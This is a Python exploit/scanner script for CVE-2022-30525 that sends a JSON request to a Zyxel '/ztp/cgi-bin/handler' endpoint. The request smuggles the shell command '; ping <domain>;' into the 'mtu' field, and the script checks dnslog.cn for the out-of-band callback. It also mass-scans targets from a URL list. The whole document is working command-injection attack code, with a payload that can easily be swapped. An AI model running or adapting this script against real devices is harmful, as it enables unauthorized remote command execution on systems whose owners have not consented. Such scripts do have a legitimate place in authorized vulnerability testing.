CVE-2022-30525.py

#!/usr/bin/python3

import random, sys, urllib3, json, time, requests
from optparse import OptionParser

urllib3.disable_warnings()

class detection(object):
    def __init__(self, option):
        self.option = option
        self.url = options.url
        self.file = options.ip_file
        self.res = requests.session()

    def dnslogFetch(self):
        target = random.random()
        url = f"http://www.dnslog.cn/getdomain.php?t={target}"
        res1 = self.res.get(url=url)
        if res1.status_code == 200 and "dnslog" in res1.text:
            return res1.text
        else:
            print("Unable to discover DNSLog")

    def identification(self):
        target_url = self.url + "/ztp/cgi-bin/handler"
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36",
            "Content-Type": "application/json"
        }
        extractedlog = self.dnslogFetch()
        print(extractedlog)

        data = {
                "command": "setWanPortSt",
                "proto": "dhcp",
                "port": "4",
                "vlan_tagged": "1",
                "vlanid": "5",
                "mtu": f"; ping {extractedlog};",
                "data": "hi"
                }
        try:
            response = requests.post(url=target_url, headers=headers, data=json.dumps(data), timeout=5, verify=False)
        except Exception as e:
            pass

        time.sleep(5)
        url_record = f"http://www.dnslog.cn/getrecords.php?t={random.random()}"
        print(self.res.get(url=url_record).text)
        if extractedlog in self.res.get(url=url_record).text:
            print(f"{self.url} is vulnerable to CVE-2022-30525")
        else:
            print(f"{self.url} is not vulnerable to CVE-2022-30525")

    def BulkScan(self):
        with open(self.file, "r+") as urls:
            for url in urls:
                url = url.strip()
                if url[:4] != "http":
                    url = "http://" + url
                self.url = url.strip()
                detection.identification(self)


def banner():
        print("""CVE-2022-30525 exploit for Single and Multiple Targets""")


if __name__ == "__main__":
    banner()

    parser = OptionParser()
    parser.add_option("-iL", "--bulk", dest="ip_file", help="File containing list of URLs")
    parser.add_option("-u", "--single", dest="url", type="string", help="Target URL Address")
    (options, args) = parser.parse_args()

    if options.url:
        detection(options).identification()
    elif options.ip_file:
        detection(options).BulkScan()
    else:
        parser.print_help()
        sys.exit(1)